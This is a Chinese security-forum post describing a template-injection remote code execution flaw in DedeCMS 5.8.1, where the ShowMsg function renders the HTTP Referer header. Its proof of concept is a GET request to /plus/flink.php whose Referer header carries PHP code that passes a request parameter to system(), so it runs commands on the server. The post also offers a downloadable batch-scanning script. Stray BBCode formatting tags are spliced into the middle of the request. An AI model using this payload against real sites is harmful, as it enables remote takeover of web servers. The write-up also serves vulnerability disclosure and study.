用户
搜索

[web安全] 织梦5.8.1 RCE漏洞

  • TA的每日心情
    开心
    2021-10-6 22:44
  • 签到天数: 7 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-见习白帽

    Rank: 3Rank: 3

    8

    主题

    31

    帖子

    354

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-2-4
    发表于 2021-10-6 22:51:16 01439
    织梦5.8.1 RCE漏洞

    在include\common.func.php文件中的ShowMsg函数存在模板注入
    i春秋1.png

    [PHP] 纯文本查看 复制代码
    $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

    从Referer头中取值,然后进行渲染,造成RCE
    [PHP] 纯文本查看 复制代码
    $tpl = new DedeTemplate();
    $tpl->LoadString($msg);

    POC:
    [PHP] 纯文本查看 复制代码
    GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
    Host: 10.211.55.3[/size][/font][/color][/align][align=left][font=Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, PingFang SC, Cambria, Cochin, Georgia, Times, Times New Roman, serif][color=#3f3f3f]cookie:[/color][/font]PHPSESSID=ferfe1a0k6qd5u9ol5gbd6nieu[/align][align=left][color=rgb(63, 63, 63)][font=Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &quot][size=16px]Referer: <?php "system"($c);die;/*
    如果有人懒的话 可以直接下载现成的PHP批量检测
    i春秋2.png
    dede5.8.1.rar (1.09 KB, 下载次数: 13, 售价: 5 魔法币)
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册